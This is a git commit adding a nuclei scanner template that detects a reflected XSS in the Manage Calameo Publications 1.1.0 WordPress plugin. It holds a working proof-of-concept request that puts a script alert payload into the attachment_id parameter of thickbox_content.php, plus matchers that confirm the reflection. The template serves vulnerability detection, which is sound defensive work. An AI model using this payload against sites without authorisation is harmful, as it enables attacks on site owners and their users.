Merge pull request #5003 from projectdiscovery/wp-athlon-manage-calameo-publications-xss

Create wp-athlon-manage-calameo-publications-xss.yaml
2022-08-05 07:50:26 +04:00 · 2022-08-05 07:50:26 +04:00 · b0c3a1dedd
parent 441d4f6237 5538c251dd
commit b0c3a1dedd
1 changed files with 36 additions and 0 deletions
--- a/vulnerabilities/wordpress/calameo-publications-xss.yaml
+++ b/vulnerabilities/wordpress/calameo-publications-xss.yaml
@ -0,0 +1,36 @@
+id: calameo-publications-xss
+
+info:
+  name: Manage Calameo Publications 1.1.0 - thickbox_content.php attachment_id Parameter Reflected XSS
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    The Manage Calameo Publications by Athlon WordPress plugin was affected by a thickbox_content.php attachment_id Parameter Reflected XSS security vulnerability.
+  reference:
+    - https://codevigilant.com/disclosure/wp-plugin-athlon-manage-calameo-publications-a3-cross-site-scripting-xss/
+    - https://wpscan.com/vulnerability/83343eb3-bb4c-4b82-adf6-745882f872cc
+    - https://wordpress.org/plugins/athlon-manage-calameo-publications/
+  metadata:
+    verified: true
+  tags: wordpress,wp-plugin,xss,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ath_upload_calameo_publication(id\"><script>alert(document.domain)</script>&)'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200